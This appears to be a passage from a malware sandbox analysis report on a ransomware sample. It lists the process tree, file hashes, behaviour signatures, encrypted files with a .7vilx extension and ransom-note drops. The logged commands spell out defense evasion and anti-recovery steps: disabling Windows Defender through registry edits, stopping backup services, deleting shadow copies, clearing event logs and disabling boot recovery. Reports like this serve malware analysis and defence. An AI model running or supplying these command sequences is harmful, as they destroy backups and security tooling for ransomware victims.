| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
"C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/520-55-0x0000000000000000-mapping.dmp
memory/848-56-0x0000000000000000-mapping.dmp
memory/532-57-0x0000000000000000-mapping.dmp
memory/628-58-0x0000000000000000-mapping.dmp
memory/1624-59-0x0000000000000000-mapping.dmp
memory/1108-60-0x0000000000000000-mapping.dmp
memory/796-61-0x0000000000000000-mapping.dmp
memory/964-62-0x0000000000000000-mapping.dmp
memory/2008-63-0x0000000000000000-mapping.dmp
memory/1640-64-0x0000000000000000-mapping.dmp
memory/1820-65-0x0000000000000000-mapping.dmp
memory/1252-66-0x0000000000000000-mapping.dmp
memory/2036-67-0x0000000000000000-mapping.dmp
memory/1860-68-0x0000000000000000-mapping.dmp
memory/1460-69-0x0000000000000000-mapping.dmp
memory/1500-70-0x0000000000000000-mapping.dmp
memory/1548-71-0x0000000000000000-mapping.dmp
memory/868-72-0x0000000000000000-mapping.dmp
memory/588-73-0x0000000000000000-mapping.dmp
memory/1760-74-0x0000000000000000-mapping.dmp
memory/900-75-0x0000000000000000-mapping.dmp
memory/1076-76-0x0000000000000000-mapping.dmp
memory/1596-77-0x0000000000000000-mapping.dmp
memory/268-78-0x0000000000000000-mapping.dmp
memory/1012-79-0x0000000000000000-mapping.dmp
memory/1364-80-0x0000000000000000-mapping.dmp
memory/1352-81-0x0000000000000000-mapping.dmp
memory/964-82-0x0000000000000000-mapping.dmp
memory/1828-83-0x0000000000000000-mapping.dmp
memory/2040-84-0x0000000000000000-mapping.dmp
memory/1484-85-0x0000000000000000-mapping.dmp
memory/1476-86-0x0000000000000000-mapping.dmp
memory/1436-87-0x0000000000000000-mapping.dmp
memory/1732-88-0x0000000000000000-mapping.dmp
memory/1752-89-0x0000000000000000-mapping.dmp
memory/1676-90-0x0000000000000000-mapping.dmp
memory/2044-91-0x0000000000000000-mapping.dmp
memory/1584-92-0x0000000000000000-mapping.dmp
memory/1664-93-0x0000000000000000-mapping.dmp
memory/1228-94-0x0000000000000000-mapping.dmp
memory/1108-95-0x0000000000000000-mapping.dmp
memory/1620-96-0x0000000000000000-mapping.dmp
memory/1252-97-0x0000000000000000-mapping.dmp
memory/1860-98-0x0000000000000000-mapping.dmp
memory/480-99-0x0000000000000000-mapping.dmp
memory/916-100-0x0000000000000000-mapping.dmp
memory/1064-101-0x0000000000000000-mapping.dmp
memory/324-102-0x0000000000000000-mapping.dmp
memory/468-103-0x0000000000000000-mapping.dmp
memory/1792-104-0x0000000000000000-mapping.dmp
memory/968-105-0x0000000000000000-mapping.dmp
memory/1280-106-0x0000000000000000-mapping.dmp
memory/788-107-0x0000000000000000-mapping.dmp
memory/1008-108-0x0000000000000000-mapping.dmp
memory/1704-109-0x0000000000000000-mapping.dmp
memory/1356-110-0x0000000000000000-mapping.dmp
memory/1628-111-0x0000000000000000-mapping.dmp
memory/1500-112-0x0000000000000000-mapping.dmp
memory/1564-113-0x0000000000000000-mapping.dmp
memory/1564-114-0x000007FEFC241000-0x000007FEFC243000-memory.dmp
memory/1916-115-0x0000000000000000-mapping.dmp
memory/1904-117-0x0000000000000000-mapping.dmp
memory/328-119-0x0000000000000000-mapping.dmp
memory/428-120-0x0000000000000000-mapping.dmp
memory/2076-121-0x0000000000000000-mapping.dmp
memory/2172-123-0x000007FEF34A0000-0x000007FEF3FFD000-memory.dmp
memory/2172-125-0x0000000002312000-0x0000000002314000-memory.dmp
memory/2172-124-0x0000000002310000-0x0000000002312000-memory.dmp
memory/2172-126-0x0000000002314000-0x0000000002317000-memory.dmp
memory/2172-127-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
memory/2172-128-0x000000000231B000-0x000000000233A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 83496c4d15bce978d48adfed8fe5b24d |
| SHA1 | b2053c07f8f4a8028473f80717bf83befc059edd |
| SHA256 | d9aa188d7735b48f0071c28548977545b6e8bf001ac6132bcf7c2340ca347ae4 |
| SHA512 | 1f1bef015933cb3b1ec1a60211a40e09c58d0a1b562c96e55d5851c1a5c2815cac2b3c847d66b935adf97fb74d1f0863a5a4fc7c29fe47395f81f8006a1681a0 |
memory/2264-131-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp
memory/2264-132-0x000000001B720000-0x000000001BA1F000-memory.dmp
memory/2264-134-0x0000000002852000-0x0000000002854000-memory.dmp
memory/2264-133-0x0000000002850000-0x0000000002852000-memory.dmp
memory/2264-135-0x0000000002854000-0x0000000002857000-memory.dmp
memory/2264-136-0x000000000285B000-0x000000000287A000-memory.dmp
C:\4a7Z_HOW_TO_DECRYPT.txt
| MD5 | e8581e1c0975e92f67bf014e1e1adb97 |
| SHA1 | 22b2946186cdfbd125da2de12550df1394b6548e |
| SHA256 | b5a8f263eaf410d0353d41f31c68080dcc3ac5f6272de7970b23f0b47e55cfd6 |
| SHA512 | cc2ec7f112a1629d47687dfb41988404a107ec79644f222121478ce0134e0f6410d6496988e45b681f463ba71d56666afc2355f92a10501e9c094bc4665085ae |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:09
Reported
2022-01-12 19:15
Platform
win10-en-20211208
Max time kernel
190s
Max time network
190s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Ujwl9iHmxUY0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Configuration\ssn_high_group_info.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_rofJqU4pChc0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL065.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_eBOY3RO53TU0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\LargeLogo.scale-150_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_p_hMd8bINYQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl64.dlla.manifest.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_2bS6xc-Zhtk0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-32_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\br_16x11.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_KZjNKXMH__k0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\defaults\pref\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_8I_z7LzPC480.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\en-US\tokens_enUS.xml | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_-SmSuwfIZ7o0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN054.XML.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_FNpwLpapTCE0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Beach\mask\mask_corners.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\kr_60x42.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionSmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\es-ES\msdaremr.dll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_a_yF1vnNIo40.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_t39-2RvCNxQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\173.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_11c.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_lme3EMl7dEk0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\4a7Z_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_tZSrHbt0DTQ0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\150.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_jm-jo4GFGZE0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\gp_16x11.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6767_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_BeforeEach_AfterEach.help.txt | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_P4yKFt4WcYo0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_9_-e26i7bQc0.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\net.properties.P4A0om6dyJ69pET-c45GcB-uqooA8AFMtv1HnoBH73r_Z1McZNKVXJ00.7vilx | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_13d.png | C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe | N/A |
